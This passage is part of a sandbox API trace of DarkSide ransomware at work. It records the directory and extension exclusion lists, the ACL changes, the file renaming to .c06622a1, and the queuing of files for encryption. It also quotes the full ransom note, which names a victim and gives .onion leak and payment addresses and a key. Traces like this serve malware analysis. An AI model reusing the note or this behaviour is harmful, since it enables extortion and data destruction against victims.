(CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0155.869] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.869] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.869] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff11c70, ftCreationTime.dwHighDateTime=0x1d5daf2, ftLastAccessTime.dwLowDateTime=0xcbbd0240, ftLastAccessTime.dwHighDateTime=0x1d5e068, ftLastWriteTime.dwLowDateTime=0xcbbd0240, ftLastWriteTime.dwHighDateTime=0x1d5e068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z9eYlXFnqtFPpM", cAlternateFileName="Z9EYLX~1")) returned 1 [0155.869] _wcsicmp (_Str1="$recycle.bin", _Str2="Z9eYlXFnqtFPpM") returned -86 [0155.869] wcslen (_String="$recycle.bin") returned 0xc [0155.869] _wcsicmp (_Str1="config.msi", _Str2="Z9eYlXFnqtFPpM") returned -23 [0155.869] wcslen (_String="config.msi") returned 0xa [0155.869] _wcsicmp (_Str1="$windows.~bt", _Str2="Z9eYlXFnqtFPpM") returned -86 [0155.869] wcslen (_String="$windows.~bt") returned 0xc [0155.869] _wcsicmp (_Str1="$windows.~ws", _Str2="Z9eYlXFnqtFPpM") returned -86 [0155.869] wcslen (_String="$windows.~ws") returned 0xc [0155.869] _wcsicmp (_Str1="windows", _Str2="Z9eYlXFnqtFPpM") returned -3 [0155.869] wcslen (_String="windows") returned 0x7 [0155.869] _wcsicmp (_Str1="appdata", _Str2="Z9eYlXFnqtFPpM") returned -25 [0155.869] wcslen (_String="appdata") returned 0x7 [0155.869] _wcsicmp (_Str1="application data", _Str2="Z9eYlXFnqtFPpM") returned -25 [0155.869] wcslen (_String="application data") returned 0x10 [0155.869] _wcsicmp (_Str1="boot", _Str2="Z9eYlXFnqtFPpM") returned -24 [0155.869] wcslen (_String="boot") returned 0x4 [0155.869] _wcsicmp (_Str1="google", _Str2="Z9eYlXFnqtFPpM") returned -19 [0155.869] wcslen (_String="google") returned 0x6 [0155.869] _wcsicmp (_Str1="mozilla", _Str2="Z9eYlXFnqtFPpM") returned -13 [0155.869] wcslen (_String="mozilla") returned 0x7 [0155.869] _wcsicmp (_Str1="program files", _Str2="Z9eYlXFnqtFPpM") returned -10 [0155.869] wcslen (_String="program files") returned 0xd [0155.869] _wcsicmp (_Str1="program files (x86)", _Str2="Z9eYlXFnqtFPpM") returned -10 [0155.869] wcslen (_String="program files (x86)") returned 0x13 [0155.870] _wcsicmp (_Str1="programdata", _Str2="Z9eYlXFnqtFPpM") returned -10 [0155.870] wcslen (_String="programdata") returned 0xb [0155.870] _wcsicmp (_Str1="system volume information", _Str2="Z9eYlXFnqtFPpM") returned -7 [0155.870] wcslen (_String="system volume information") returned 0x19 [0155.870] _wcsicmp (_Str1="tor browser", _Str2="Z9eYlXFnqtFPpM") returned -6 [0155.870] wcslen (_String="tor browser") returned 0xb [0155.870] _wcsicmp (_Str1="windows.old", _Str2="Z9eYlXFnqtFPpM") returned -3 [0155.870] wcslen (_String="windows.old") returned 0xb [0155.870] _wcsicmp (_Str1="intel", _Str2="Z9eYlXFnqtFPpM") returned -17 [0155.870] wcslen (_String="intel") returned 0x5 [0155.870] _wcsicmp (_Str1="msocache", _Str2="Z9eYlXFnqtFPpM") returned -13 [0155.870] wcslen (_String="msocache") returned 0x8 [0155.870] _wcsicmp (_Str1="perflogs", _Str2="Z9eYlXFnqtFPpM") returned -10 [0155.870] wcslen (_String="perflogs") returned 0x8 [0155.870] _wcsicmp (_Str1="x64dbg", _Str2="Z9eYlXFnqtFPpM") returned -2 [0155.870] wcslen (_String="x64dbg") returned 0x6 [0155.870] _wcsicmp (_Str1="public", _Str2="Z9eYlXFnqtFPpM") returned -10 [0155.870] wcslen (_String="public") returned 0x6 [0155.870] _wcsicmp (_Str1="all users", _Str2="Z9eYlXFnqtFPpM") returned -25 [0155.870] wcslen (_String="all users") returned 0x9 [0155.870] _wcsicmp (_Str1="default", _Str2="Z9eYlXFnqtFPpM") returned -22 [0155.870] wcslen (_String="default") returned 0x7 [0155.870] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\*" [0155.870] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\*") returned 0x3d [0155.870] wcscpy (in: _Dest=0x4510110, _Source="Z9eYlXFnqtFPpM" | out: _Dest="Z9eYlXFnqtFPpM") returned="Z9eYlXFnqtFPpM" [0155.870] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.870] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.872] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.872] GetNamedSecurityInfoW () returned 0x0 [0155.872] SetEntriesInAclW () returned 0x0 [0155.872] SetNamedSecurityInfoW () returned 0x0 [0155.878] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d584b8) returned 1 [0155.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.878] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 1 [0155.878] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0155.878] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0155.878] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0155.879] CloseHandle (hObject=0x678) returned 1 [0155.879] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.880] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.880] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\") returned="" [0155.880] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\") returned 0x4b [0155.880] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0155.880] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff11c70, ftCreationTime.dwHighDateTime=0x1d5daf2, ftLastAccessTime.dwLowDateTime=0xdb8731e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb8731e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.881] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943f2230, ftCreationTime.dwHighDateTime=0x1d5e397, ftLastAccessTime.dwLowDateTime=0xc144d9e0, ftLastAccessTime.dwHighDateTime=0x1d5d817, ftLastWriteTime.dwLowDateTime=0xc144d9e0, ftLastWriteTime.dwHighDateTime=0x1d5d817, nFileSizeHigh=0x0, nFileSizeLow=0x17f3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5IcsU.bmp", cAlternateFileName="")) returned 1 [0155.881] _wcsicmp (_Str1="5IcsU.bmp", _Str2="README.c06622a1.TXT") returned -61 [0155.881] wcsstr (_Str="5IcsU.bmp", _SubStr="README") returned 0x0 [0155.881] _wcsicmp (_Str1="autorun.inf", _Str2="5IcsU.bmp") returned 44 [0155.881] wcslen (_String="autorun.inf") returned 0xb [0155.881] _wcsicmp (_Str1="boot.ini", _Str2="5IcsU.bmp") returned 45 [0155.881] wcslen (_String="boot.ini") returned 0x8 [0155.881] _wcsicmp (_Str1="bootfont.bin", _Str2="5IcsU.bmp") returned 45 [0155.881] wcslen (_String="bootfont.bin") returned 0xc [0155.881] _wcsicmp (_Str1="bootsect.bak", _Str2="5IcsU.bmp") returned 45 [0155.881] wcslen (_String="bootsect.bak") returned 0xc [0155.881] _wcsicmp (_Str1="desktop.ini", _Str2="5IcsU.bmp") returned 47 [0155.881] wcslen (_String="desktop.ini") returned 0xb [0155.881] _wcsicmp (_Str1="iconcache.db", _Str2="5IcsU.bmp") returned 52 [0155.881] wcslen (_String="iconcache.db") returned 0xc [0155.881] _wcsicmp (_Str1="ntldr", _Str2="5IcsU.bmp") returned 57 [0155.881] wcslen (_String="ntldr") returned 0x5 [0155.881] _wcsicmp (_Str1="ntuser.dat", _Str2="5IcsU.bmp") returned 57 [0155.882] wcslen (_String="ntuser.dat") returned 0xa [0155.882] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5IcsU.bmp") returned 57 [0155.882] wcslen (_String="ntuser.dat.log") returned 0xe [0155.882] _wcsicmp (_Str1="ntuser.ini", _Str2="5IcsU.bmp") returned 57 [0155.882] wcslen (_String="ntuser.ini") returned 0xa [0155.882] _wcsicmp (_Str1="thumbs.db", _Str2="5IcsU.bmp") returned 63 [0155.882] wcslen (_String="thumbs.db") returned 0x9 [0155.882] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.882] wcslen (_String="386") returned 0x3 [0155.882] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.882] wcslen (_String="adv") returned 0x3 [0155.882] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.882] wcslen (_String="ani") returned 0x3 [0155.882] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.882] wcslen (_String="bat") returned 0x3 [0155.882] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.882] wcslen (_String="bin") returned 0x3 [0155.882] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.882] wcslen (_String="cab") returned 0x3 [0155.882] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.882] wcslen (_String="cmd") returned 0x3 [0155.882] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.882] wcslen (_String="com") returned 0x3 [0155.882] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.882] wcslen (_String="cpl") returned 0x3 [0155.882] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.882] wcslen (_String="cur") returned 0x3 [0155.882] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.882] wcslen (_String="deskthemepack") returned 0xd [0155.882] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.883] wcslen (_String="diagcab") returned 0x7 [0155.883] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.883] wcslen (_String="diagcfg") returned 0x7 [0155.883] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.883] wcslen (_String="diagpkg") returned 0x7 [0155.883] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.883] wcslen (_String="dll") returned 0x3 [0155.883] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.883] wcslen (_String="drv") returned 0x3 [0155.883] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.883] wcslen (_String="exe") returned 0x3 [0155.883] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.883] wcslen (_String="hlp") returned 0x3 [0155.883] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.883] wcslen (_String="icl") returned 0x3 [0155.883] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.883] wcslen (_String="icns") returned 0x4 [0155.883] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.883] wcslen (_String="ico") returned 0x3 [0155.883] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.883] wcslen (_String="ics") returned 0x3 [0155.883] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.883] wcslen (_String="idx") returned 0x3 [0155.883] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.883] wcslen (_String="ldf") returned 0x3 [0155.883] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.883] wcslen (_String="lnk") returned 0x3 [0155.883] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.883] wcslen (_String="mod") returned 0x3 [0155.883] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.883] wcslen (_String="mpa") returned 0x3 [0155.883] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.884] wcslen (_String="msc") returned 0x3 [0155.884] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.884] wcslen (_String="msp") returned 0x3 [0155.884] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.884] wcslen (_String="msstyles") returned 0x8 [0155.884] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.884] wcslen (_String="msu") returned 0x3 [0155.884] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.884] wcslen (_String="nls") returned 0x3 [0155.884] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.884] wcslen (_String="nomedia") returned 0x7 [0155.884] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.884] wcslen (_String="ocx") returned 0x3 [0155.884] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.884] wcslen (_String="prf") returned 0x3 [0155.884] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.884] wcslen (_String="ps1") returned 0x3 [0155.884] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.884] wcslen (_String="rom") returned 0x3 [0155.884] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.884] wcslen (_String="rtp") returned 0x3 [0155.884] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.884] wcslen (_String="scr") returned 0x3 [0155.884] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.884] wcslen (_String="shs") returned 0x3 [0155.884] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.884] wcslen (_String="spl") returned 0x3 [0155.884] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.884] wcslen (_String="sys") returned 0x3 [0155.884] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.884] wcslen (_String="theme") returned 0x5 [0155.885] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.885] wcslen (_String="themepack") returned 0x9 [0155.885] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.885] wcslen (_String="wpx") returned 0x3 [0155.885] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.885] wcslen (_String="lock") returned 0x4 [0155.885] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.885] wcslen (_String="key") returned 0x3 [0155.885] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.885] wcslen (_String="hta") returned 0x3 [0155.885] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.885] wcslen (_String="msi") returned 0x3 [0155.885] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.885] wcslen (_String="pdb") returned 0x3 [0155.885] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.885] wcslen (_String="sql") returned 0x3 [0155.885] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.885] wcslen (_String="sqlite") returned 0x6 [0155.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm")) returned 0x10 [0155.885] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0155.886] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM" [0155.886] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM") returned 0x4a [0155.886] wcscpy (in: _Dest=0x4560156, _Source="5IcsU.bmp" | out: _Dest="5IcsU.bmp") returned="5IcsU.bmp" [0155.886] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp", dwFileAttributes=0x80) returned 1 [0155.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\5icsu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0155.886] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.886] ReadFile (in: hFile=0x368, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0155.887] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x39a0a342 [0155.887] RtlComputeCrc32 (PartialCrc=0xa342, Buffer=0x3fe3f4, Length=0x80) returned 0x5c668364 [0155.887] RtlComputeCrc32 (PartialCrc=0x8364, Buffer=0x3fe3f4, Length=0x80) returned 0xe32580de [0155.887] RtlComputeCrc32 (PartialCrc=0x80de, Buffer=0x3fe3f4, Length=0x80) returned 0xe64316b1 [0155.887] RtlComputeCrc32 (PartialCrc=0x16b1, Buffer=0x3fe3f4, Length=0x80) returned 0x79db02f9 [0155.887] CloseHandle (hObject=0x368) returned 1 [0155.887] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0155.888] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp" [0155.888] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp") returned 0x54 [0155.888] wcscpy (in: _Dest=0x4570170, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.888] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\5icsu.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\5icsu.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\ZLQWp8VVzu\\Z9eYlXFnqtFPpM\\5IcsU.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\zlqwp8vvzu\\z9eylxfnqtfppm\\5icsu.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0155.890] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.890] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4b80020 [0155.896] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ef5391b [0155.896] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1316c35f [0155.896] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33aa19ce [0155.896] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6dded1a2 [0155.896] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x721a157b [0155.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12ce5a6b [0155.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47a7ea6c [0155.897] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3828cc8c [0155.900] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4b80094, Length=0x80) returned 0xc7fd1abd [0155.900] RtlComputeCrc32 (PartialCrc=0x1abd, Buffer=0x4b80094, Length=0x80) returned 0xd3cffa63 [0155.900] RtlComputeCrc32 (PartialCrc=0xfa63, Buffer=0x4b80094, Length=0x80) returned 0xfc505ed2 [0155.900] RtlComputeCrc32 (PartialCrc=0x5ed2, Buffer=0x4b80094, Length=0x80) returned 0xdc1b561d [0155.900] RtlComputeCrc32 (PartialCrc=0x561d, Buffer=0x4b80094, Length=0x80) returned 0xc9cdd2bc [0155.900] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0155.900] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0155.900] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0155.900] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6efca0, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xb7fd8010, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xb7fd8010, ftLastWriteTime.dwHighDateTime=0x1d5db9d, nFileSizeHigh=0x0, nFileSizeLow=0x66d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BK-cTblnCTtdx.gif", cAlternateFileName="BK-CTB~1.GIF")) returned 1 [0155.900] _wcsicmp 